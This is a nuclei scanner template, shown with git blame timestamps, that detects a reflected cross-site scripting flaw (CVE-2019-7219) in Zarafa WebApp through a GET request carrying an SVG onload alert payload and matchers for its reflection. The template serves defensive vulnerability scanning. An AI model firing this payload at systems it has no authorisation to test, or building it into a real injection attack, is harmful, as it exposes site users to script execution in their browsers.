nuclei-templates/http/cves/2019/CVE-2019-7219.yaml

48 lines
1.4 KiB
YAML
Raw Normal View History

2021-01-09 14:45:11 +00:00
id: CVE-2019-7219
2021-01-09 14:45:11 +00:00
info:
name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
2021-04-06 06:46:11 +00:00
author: pdteam
severity: medium
2021-03-30 12:10:17 +00:00
description: |
Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
2023-09-06 12:53:28 +00:00
remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
reference:
2021-03-30 12:10:17 +00:00
- https://github.com/verifysecurity/CVE-2019-7219
- https://stash.kopano.io/repos?visibility=public
- https://nvd.nist.gov/vuln/detail/CVE-2019-7219
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-7219
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00113
2023-08-31 11:46:18 +00:00
epss-percentile: 0.43991
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zarafa
product: webaccess
tags: cve,cve2019,zarafa,xss
http:
2021-01-09 14:45:11 +00:00
- method: GET
path:
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
2023-07-11 19:49:27 +00:00
2021-01-09 14:45:11 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(/xss/)>"
2023-07-11 19:49:27 +00:00
2021-01-09 14:45:11 +00:00
- type: word
part: header
words:
2021-01-11 06:44:22 +00:00
- "text/html"
2023-07-11 19:49:27 +00:00
2021-01-11 06:44:22 +00:00
- type: status
status:
- 200